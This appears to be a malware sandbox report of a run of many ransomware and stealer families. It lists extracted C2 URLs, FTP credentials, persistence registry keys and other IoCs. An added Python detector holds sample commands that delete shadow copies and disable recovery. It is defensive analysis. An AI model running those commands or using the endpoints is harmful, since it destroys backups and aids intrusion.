Resubmissions
29-12-2021 12:45  211229-py8v3sdddn  10
29-12-2021 11:51  211229-n1lb5addbm  8
29-12-2021 11:50  211229-nzsptaegg6  1
29-12-2021 11:24  211229-nh59ksege9  1
28-12-2021 11:54  211228-n21s7sdgg2  8
28-12-2021 11:53  211228-n2tpwscdbj  1
28-12-2021 11:51  211228-nz82sscdaq  1
28-12-2021 11:38  211228-nryk4acdal  10
28-12-2021 11:37  211228-nq735sdge9  1
Analysis
max time kernel: 434s
max time network: 465s
platform: windows10_x64
resource: win10-en-20211208
submitted: 29-12-2021 12:45
Static task
static1
URLScan task
urlscan1
Sample
https://www.youtube.com/channel/UCn2OJocEFxegDrjKZMIfnLw
Behavioral task
behavioral1
Sample
https://www.youtube.com/channel/UCn2OJocEFxegDrjKZMIfnLw
Resource
win10-en-20211208
Errors
General
-
Target
https://www.youtube.com/channel/UCn2OJocEFxegDrjKZMIfnLw
Malware Config
Extracted
C:\NMOCWROPZB-MANUAL.txt
gandcrab
http://gandcrabmfe6mnef.onion/6e509012a873ad6d
Extracted
Protocol: ftp
Host: 109.248.203.81
Port: 21
Username: alex
Password: easypassword
Extracted
lokibot
http://blesblochem.com/two/gates1/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
BadRabbit
Ransomware family discovered in late 2017, mainly targeting Russia and Ukraine.
-
Fantom
Ransomware which hides its encryption process behind a fake Windows Update screen.
-
Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.
-
Modifies visibility of hidden/system files in Explorer 2 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Detected Stratum cryptominer command
Looks to be attempting to contact a Stratum mining pool.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 7 IoCs
Processes:
  flow  pid   process
  342   6228  rundll32.exe
  365   6228  rundll32.exe
  365   6228  rundll32.exe
  408   6228  rundll32.exe
  461   6228  rundll32.exe
  500   6228  rundll32.exe
  503   6228  rundll32.exe
-
Blocks application from running via registry modification
Adds application to list of disallowed applications.
-
Disables RegEdit via registry modification
-
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Drops file in Drivers directory 2 IoCs
Processes:
  description  ioc  process
  File opened for modification  C:\Windows\System32\drivers\etc\hosts  cmd.exe
  File opened for modification  C:\Windows\System32\drivers\etc\hosts  Azorult.exe
-
Executes dropped EXE 37 IoCs
Processes:
  pid   process
  1200  BabylonNG_setup.exe
  1264  setup.exe
  4140  wini.exe
  5056  winit.exe
  3952  rutserv.exe
  4832  rutserv.exe
  4728  cheat.exe
  4812  rutserv.exe
  4864  ink.exe
  4352  rutserv.exe
  4380  taskhost.exe
  4620  P.exe
  1316  rfusclient.exe
  2724  rfusclient.exe
  5096  R8.exe
  940   mobsync.exe
  3920  winlogon.exe
  4992  Conhost.exe
  3488  cmd.exe
  5200  taskhostw.exe
  7020  winlogon.exe
  5168  RDPWInst.exe
  6496  Conhost.exe
  6760  software_reporter_tool.exe
  5452  software_reporter_tool.exe
  5344  software_reporter_tool.exe
  1464  software_reporter_tool.exe
  948   audiodg.exe
  4628  MicrosoftHost.exe
  6128  taskhostw.exe
  5608  sywe.exe
  7056  sywe.exe
  5164  PioYkUIY.exe
  6132  LSwIgkAg.exe
  5684  1030.tmp
  6400  taskhostw.exe
  2096  WindowsUpdate.exe
-
Modifies Installed Components in the registry 2 TTPs
-
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 12 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
  description  ioc  process
  File opened for modification  C:\Users\Admin\Pictures\AddDisconnect.png.RedEye  RedEye.exe
  File opened for modification  C:\Users\Admin\Pictures\DenyStep.tiff.RedEye  RedEye.exe
  File opened for modification  C:\Users\Admin\Pictures\UnblockConvertFrom.tif.RedEye  RedEye.exe
  File opened for modification  C:\Users\Admin\Pictures\UnprotectLock.raw.RedEye  RedEye.exe
  File opened for modification  C:\Users\Admin\Pictures\AddDisconnect.png.RedEye.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC  InfinityCrypt.exe
  File opened for modification  C:\Users\Admin\Pictures\DisconnectProtect.tif.RedEye.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC  InfinityCrypt.exe
  File opened for modification  C:\Users\Admin\Pictures\FindSplit.crw.RedEye.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC  InfinityCrypt.exe
  File opened for modification  C:\Users\Admin\Pictures\DisconnectProtect.tif.RedEye  RedEye.exe
  File opened for modification  C:\Users\Admin\Pictures\FindSplit.crw.RedEye  RedEye.exe
  File opened for modification  C:\Users\Admin\Pictures\DenyStep.tiff.RedEye.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC  InfinityCrypt.exe
  File opened for modification  C:\Users\Admin\Pictures\UnblockConvertFrom.tif.RedEye.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC  InfinityCrypt.exe
  File opened for modification  C:\Users\Admin\Pictures\UnprotectLock.raw.RedEye.D64FB7B0854CDC26728461A24572957746F9B25952390518E48EC30CE9E4F6BC  InfinityCrypt.exe
-
Sets DLL path for service in the registry 2 TTPs
-
Sets file execution options in registry 2 TTPs
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
  description  ioc  process
  Key value queried  \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\International\Geo\Nation  PioYkUIY.exe
-
Drops startup file 2 IoCs
Processes:
  description  ioc  process
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\NMOCWROPZB-MANUAL.txt  GandCrab.exe
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\a873aa8da873ad6722.lock  GandCrab.exe
-
Loads dropped DLL 17 IoCs
Processes:
  pid   process
  1264  setup.exe
  4100  rundll32.exe
  1264  setup.exe
  4156  helper.exe (x3)
  6764  svchost.exe
  5344  software_reporter_tool.exe (x7)
  5492  regsvr32.exe
  6228  rundll32.exe (x2)
-
Modifies file permissions 1 TTPs 62 IoCs
-
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
  resource   behavioral1/memory/3620-125-0x0000000000BD0000-0x0000000000BE4000-memory.dmp
  yara_rule  agile_net
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
  description  ioc  process
  Key opened  \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook  Lokibot.exe
  Key opened  \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook  Lokibot.exe
  Key opened  \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook  Lokibot.exe
-
Adds Run key to start application 2 TTPs 11 IoCs
Processes:
  description  ioc  process
  Set value (str)  \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\PioYkUIY.exe = "C:\\Users\\Admin\\fcIYAMws\\PioYkUIY.exe"  PioYkUIY.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\LSwIgkAg.exe = "C:\\ProgramData\\PEkMcMgI\\LSwIgkAg.exe"  LSwIgkAg.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"  taskhostw.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\{D96C1874-23D3-741B-5056-89006DF8340B} = "C:\\Users\\Admin\\AppData\\Roaming\\Bocit\\sywe.exe"  explorer.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\Desktop\\The-MALWARE-Repo-master\\The-MALWARE-Repo-master\\Ransomware\\RedEye.exe"  RedEye.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\Desktop\\The-MALWARE-Repo-master\\The-MALWARE-Repo-master\\Ransomware\\RedEye.exe"  RedEye.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\Desktop\\The-MALWARE-Repo-master\\The-MALWARE-Repo-master\\Ransomware\\RedEye.exe"  RedEye.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\PioYkUIY.exe = "C:\\Users\\Admin\\fcIYAMws\\PioYkUIY.exe"  ViraLock.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\LSwIgkAg.exe = "C:\\ProgramData\\PEkMcMgI\\LSwIgkAg.exe"  ViraLock.exe
  Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run  taskhostw.exe
  Key created  \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run  explorer.exe
-
Processes:
  description  ioc  process
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  setup.exe
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  rundll32.exe
-
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
  description  ioc  process
  File opened (read-only)  \??\O:  GandCrab.exe
  File opened (read-only)  \??\Q:  GandCrab.exe
  File opened (read-only)  \??\T:  GandCrab.exe
  File opened (read-only)  \??\X:  GandCrab.exe
  File opened (read-only)  \??\E:  GandCrab.exe
  File opened (read-only)  \??\M:  GandCrab.exe
  File opened (read-only)  \??\N:  GandCrab.exe
  File opened (read-only)  \??\U:  GandCrab.exe
  File opened (read-only)  \??\V:  GandCrab.exe
  File opened (read-only)  \??\G:  GandCrab.exe
  File opened (read-only)  \??\I:  GandCrab.exe
  File opened (read-only)  \??\K:  GandCrab.exe
  File opened (read-only)  \??\L:  GandCrab.exe
  File opened (read-only)  \??\P:  GandCrab.exe
  File opened (read-only)  \??\A:  GandCrab.exe
  File opened (read-only)  \??\B:  GandCrab.exe
  File opened (read-only)  \??\F:  GandCrab.exe
  File opened (read-only)  \??\Y:  GandCrab.exe
  File opened (read-only)  \??\R:  GandCrab.exe
  File opened (read-only)  \??\S:  GandCrab.exe
  File opened (read-only)  \??\W:  GandCrab.exe
  File opened (read-only)  \??\Z:  GandCrab.exe
  File opened (read-only)  \??\D:  explorer.exe
  File opened (read-only)  \??\H:  GandCrab.exe
  File opened (read-only)  \??\J:  GandCrab.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Modifies WinLogon 2 TTPs 1 IoCs
Processes:
  description  ioc  process
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"  RDPWInst.exe
-
Drops autorun.inf file 1 TTPs
Malware can abuse Windows Autorun to spread further via attached volumes.
-
Drops file in System32 directory 8 IoCs
Processes:
  description  ioc  process
  File opened for modification  C:\Windows\System32\GroupPolicy\gpt.ini  schtasks.exe
  File created  C:\Windows\System32\GroupPolicy\Machine\Registry.pol  schtasks.exe
  File opened for modification  C:\Windows\System32\GroupPolicy\GPT.INI  schtasks.exe
  File created  C:\Windows\SysWOW64\shell32.dll.exe  PioYkUIY.exe
  File opened for modification  C:\Windows\SysWOW64\rutserv.pdb  rutserv.exe
  File opened for modification  C:\Windows\SysWOW64\exe\rutserv.pdb  rutserv.exe
  File opened for modification  C:\Windows\SysWOW64\symbols\exe\rutserv.pdb  rutserv.exe
  File opened for modification  C:\Windows\System32\GroupPolicy  schtasks.exe
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
  description  ioc  process
  Set value (str)  \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\WallPaper = "C:\\redeyebmp.bmp"  RedEye.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\\\bxmeoengtf.bmp"  GandCrab.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 33 IoCs
Processes:
  pid   process
  1824  explorer.exe (x4)
  7056  sywe.exe (x4)
  7064  WerFault.exe (x4)
  4584  DllHost.exe (x4)
  7056  sywe.exe
  5468  DllHost.exe (x4)
  6400  taskhostw.exe (x4)
  6660  WerFault.exe (x4)
  2096  WindowsUpdate.exe (x4)
-
Suspicious use of SetThreadContext 3 IoCs
Processes:
  description  pid  process  target process
  PID 3620 set thread context of 4348  3620  Lokibot.exe  Lokibot.exe
  PID 2180 set thread context of 3400  2180  satan.exe  satan.exe
  PID 5608 set thread context of 7056  5608  sywe.exe  sywe.exe
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 21 IoCs
Processes:
  description  ioc  process
  File created  C:\Windows\rescache\_merged\1601268389\1361672858.pri  taskmgr.exe
  File created  C:\Windows\rescache\_merged\3060194815\1650753000.pri  SystemSettings.exe
  File created  C:\Windows\rescache\_merged\3720402701\1659841449.pri  SystemSettings.exe
  File created  C:\Windows\rescache\_merged\2717123927\1253081315.pri  explorer.exe
  File created  C:\Windows\rescache\_merged\1601268389\1361672858.pri  SearchUI.exe
  File created  C:\Windows\rescache\_merged\2717123927\1253081315.pri  taskmgr.exe
  File opened for modification  C:\Windows\infpub.dat  rundll32.exe
  File created  C:\Windows\cscc.dat  rundll32.exe
  File created  C:\Windows\rescache\_merged\4183903823\97717462.pri  taskmgr.exe
  File created  C:\Windows\rescache\_merged\1601268389\1361672858.pri  taskmgr.exe
  File created  C:\Windows\rescache\_merged\4183903823\97717462.pri  taskmgr.exe
  File created  C:\Windows\rescache\_merged\2717123927\1253081315.pri  SystemSettings.exe
  File created  C:\Windows\rescache\_merged\4183903823\97717462.pri  ShellExperienceHost.exe
  File created  C:\Windows\rescache\_merged\4032412167\2701812693.pri  ShellExperienceHost.exe
  File created  C:\Windows\Nope.txt  RedEye.exe
  File created  C:\Windows\dispci.exe  rundll32.exe
  File opened for modification  C:\Windows\1030.tmp  rundll32.exe
  File created  C:\Windows\rescache\_merged\4032412167\2701812693.pri  explorer.exe
  File created  C:\Windows\infpub.dat  BadRabbit.exe
  File created  C:\Windows\infpub.dat  BadRabbit.exe
  File opened for modification  C:\Windows\infpub.dat  rundll32.exe
-
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 6 IoCs
All six WerFault.exe reports are for crashes of DllHost.exe (COM Surrogate) instances; target pid 6604 crashed twice.
Processes: WerFault.exe
pid | pid_target | process | target process
7064 | 3760 | WerFault.exe | DllHost.exe
6928 | 7164 | WerFault.exe | DllHost.exe
4528 | 1328 | WerFault.exe | DllHost.exe
6508 | 4452 | WerFault.exe | DllHost.exe
6660 | 6604 | WerFault.exe | DllHost.exe
6396 | 6604 | WerFault.exe | DllHost.exe
-
Checks SCSI registry key(s) 3 TTPs 22 IoCs
SCSI information is often read in order to detect sandboxing environments.
In this run, however, all 22 reads come from explorer.exe, taskmgr.exe and SystemSettings.exe, i.e. Windows shell components enumerating the sandbox's disk and DVD devices (vendor string DADY). None of the dropped samples appears in this list, so the signature is background noise here rather than evidence of evasion.
Processes: explorer.exe, taskmgr.exe, SystemSettings.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | explorer.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | explorer.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID | SystemSettings.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID | explorer.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | explorer.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | explorer.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | explorer.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | explorer.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 | SystemSettings.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 | explorer.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | explorer.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities | explorer.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities | explorer.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | SystemSettings.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | SystemSettings.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags | explorer.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | taskmgr.exe
-
Checks processor information in registry 2 TTPs 13 IoCs
Processor information is often read in order to detect sandboxing environments.
Here the reads by firefox.exe and WINWORD.EXE are ordinary application behaviour; the hits that matter are InfinityCrypt.exe and GandCrab.exe reading ProcessorNameString (and, for GandCrab.exe, Identifier), which is consistent with environment fingerprinting by the samples.
Processes: InfinityCrypt.exe, firefox.exe, GandCrab.exe, WINWORD.EXE
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | InfinityCrypt.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | InfinityCrypt.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | GandCrab.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | GandCrab.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | GandCrab.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | firefox.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution. Only the pids are recorded in this section; the task names and actions are not shown.
Processes: schtasks.exe
pid | process
5672 | schtasks.exe
4620 | schtasks.exe
3152 | schtasks.exe
5352 | schtasks.exe
-
Delays execution with timeout.exe 6 IoCs
Processes: timeout.exe
pid | process
212 | timeout.exe
4332 | timeout.exe
5176 | timeout.exe
6264 | timeout.exe
6900 | timeout.exe
6708 | timeout.exe
-
Enumerates system info in registry 2 TTPs 8 IoCs
All eight BIOS reads come from WINWORD.EXE, chrome.exe and SearchUI.exe; none of the dropped samples appears here.
Processes: WINWORD.EXE, chrome.exe, SearchUI.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | SearchUI.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | SearchUI.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes: ipconfig.exe
pid | process
5236 | ipconfig.exe
-
Interacts with shadow copies 2 TTPs 4 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery. Only the pids of the four vssadmin.exe executions are recorded here, not their arguments, so this section alone does not distinguish a deletion from a listing.
Processes: vssadmin.exe
pid | process
4248 | vssadmin.exe
1688 | vssadmin.exe
6620 | vssadmin.exe
3692 | vssadmin.exe
-
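Because the report shows vssadmin.exe by pid only, the following added example (not part of the report or of the sandbox's own signature logic) shows the command-line matching that a detection rule for this technique needs. The process events, including every command line, are constructed for illustration; only the four pids are borrowed from the rows above, and the parent image names are invented.

```python
"""Flag shadow-copy and recovery tampering (ATT&CK T1490) in process-creation events.

Added example, not part of the sandbox report: the report lists four vssadmin.exe
executions by pid only (4248, 1688, 6620, 3692), so the command lines below are
constructed to show what detection logic has to key on.
"""
import re
from dataclasses import dataclass
from typing import List

# (image name, pattern over the lower-cased command line).  These are the
# documented ways ransomware removes or starves Volume Shadow Copies and
# disables Windows recovery; a bare "vssadmin list shadows" does not match.
RULES = [
    ("vssadmin.exe", re.compile(r"\bdelete\s+shadows\b")),
    ("vssadmin.exe", re.compile(r"\bresize\s+shadowstorage\b.*\bmaxsize=")),
    ("wmic.exe",     re.compile(r"\bshadowcopy\b.*\bdelete\b")),
    ("wbadmin.exe",  re.compile(r"\bdelete\s+(?:catalog|systemstatebackup)\b")),
    ("bcdedit.exe",  re.compile(r"\brecoveryenabled\s+no\b|\bbootstatuspolicy\s+ignoreallfailures\b")),
]


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str      # file name of the executed image
    cmdline: str
    parent: str     # parent image; carried into hits for triage, not used in matching


@dataclass(frozen=True)
class Hit:
    pid: int
    image: str
    rule: str
    parent: str


def inhibit_recovery_hits(events: List[ProcEvent]) -> List[Hit]:
    """Return one Hit per (event, rule) pair whose image and command line match."""
    hits = []
    for ev in events:
        image = ev.image.lower()
        cmd = ev.cmdline.lower()
        for rule_image, pattern in RULES:
            if image == rule_image and pattern.search(cmd):
                hits.append(Hit(ev.pid, ev.image, pattern.pattern, ev.parent))
    return hits


# Constructed sample: pids borrowed from the report, command lines and parents
# invented for illustration (the report does not record them).
SAMPLE_EVENTS = [
    ProcEvent(4248, "vssadmin.exe", "vssadmin.exe Delete Shadows /All /Quiet", "cmd.exe"),
    ProcEvent(1688, "vssadmin.exe", "vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB", "cmd.exe"),
    ProcEvent(6620, "vssadmin.exe", "vssadmin.exe list shadows", "cmd.exe"),           # benign query
    ProcEvent(3692, "vssadmin.exe", "vssadmin.exe Delete Shadows /Quiet", "BadRabbit.exe"),
    ProcEvent(7001, "wmic.exe", "wmic shadowcopy delete /nointeractive", "cmd.exe"),
    ProcEvent(7002, "bcdedit.exe", "bcdedit /set {default} recoveryenabled No", "cmd.exe"),
    ProcEvent(7003, "bcdedit.exe", "bcdedit /enum", "cmd.exe"),                       # benign query
]


def flagged_pids(events: List[ProcEvent] = SAMPLE_EVENTS) -> List[int]:
    """Distinct pids with at least one hit, in event order."""
    seen: List[int] = []
    for hit in inhibit_recovery_hits(events):
        if hit.pid not in seen:
            seen.append(hit.pid)
    return seen


if __name__ == "__main__":
    for hit in inhibit_recovery_hits(SAMPLE_EVENTS):
        print(f"pid {hit.pid:<5} {hit.image:<13} parent={hit.parent:<14} rule={hit.rule}")
```

The rules match on the image name plus the argument shape rather than on the bare image, so an administrator's "vssadmin list shadows" does not fire while the shadowstorage-resize trick (which forces old shadows to be purged without a delete command) does. On a live host the same logic applies to Sysmon event 1 or Windows event 4688 with command-line auditing enabled.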
Kills process with taskkill 5 IoCs
Processes: taskkill.exe
pid | process
3516 | taskkill.exe
1392 | taskkill.exe
5560 | taskkill.exe
5144 | taskkill.exe
4332 | taskkill.exe
-
Processes:
explorer.exerundll32.exesetup.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\IECookies = "|affilID=|trkInfo=|visitorID=" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch setup.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 